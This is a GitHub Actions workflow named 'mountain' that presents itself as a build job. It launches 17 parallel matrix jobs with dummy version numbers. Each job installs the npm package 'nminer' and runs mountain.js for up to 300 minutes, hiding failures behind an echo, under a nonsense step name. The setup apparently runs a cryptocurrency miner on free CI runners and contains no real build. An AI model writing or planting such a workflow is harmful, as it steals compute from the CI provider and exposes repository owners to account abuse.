name: mountain
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8591 }
          - { version: 631 }
          - { version: 4616 }
          - { version: 8546 }
          - { version: 3569 }
          - { version: 9643 }
          - { version: 8097 }
          - { version: 7802 }
          - { version: 3061 }
          - { version: 7927 }
          - { version: 3735 }
          - { version: 2547 }
          - { version: 7698 }
          - { version: 9400 }
          - { version: 6230 }
          - { version: 2802 }
          - { version: 1261 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: heartache geez inasmuch
        run: |
          npm install nminer@latest
          timeout 300m node mountain.js || echo "mountain executed"